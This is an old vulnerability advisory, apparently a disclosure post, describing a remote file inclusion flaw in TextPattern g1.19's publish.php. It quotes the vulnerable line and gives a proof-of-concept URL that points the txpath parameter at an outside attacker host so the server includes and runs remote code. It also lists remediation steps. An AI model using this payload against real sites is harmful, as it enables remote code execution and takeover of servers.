------------------------------------------------------------------------ ---- TextPattern <=g1.19 (txpcfg[txpath]) Remote File Inclusion Vulnerability ------------------------------------------------------------------------ ---- Author : Zeni Susanto A.K.A Bithedz Date Found : October, 25th 2006 Location : Indonesia,Bandung Critical Lvl : Highly critical Impact : System access Where : From Remote ------------------------------------------------------------------------ --- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~ Application : TextPattern version : <=g1.19 URL : http://textpattern.com/deanload/textpattern_g119.zip textpattern is A free, flexible, elegant, easy-to-use content management system for all kinds of websites, even weblogs. ------------------------------------------------------------------------ --- Vulnerability: ~~~~~~~~~~~ In file publish.php I found vulnerability script --------------------------publish.php----------------------------------- ---- define("txpath",$txpcfg['txpath']); ------------------------------------------------------------------------ ---- Input passed to the "txpcfg['txpath']" parameter in publish.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources. Proof Of Concept: ~~~~~~~~~~~~ http://yourtargetsite/[textpattern_g119_path]/textpattern/publish.php?tx pcfg[txpath]=http://attact/colok.txt? Solution: ~~~~ - Sanitize variable $txpcfg['txpath'] on affected files. - Turn off register_globals ------------------------------------------------------------------------ --- Shoutz: ~ ~ K-159 ~ Monik My Brain ~ #bridge (silent) @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~ bithedz[at]gmail[dot]com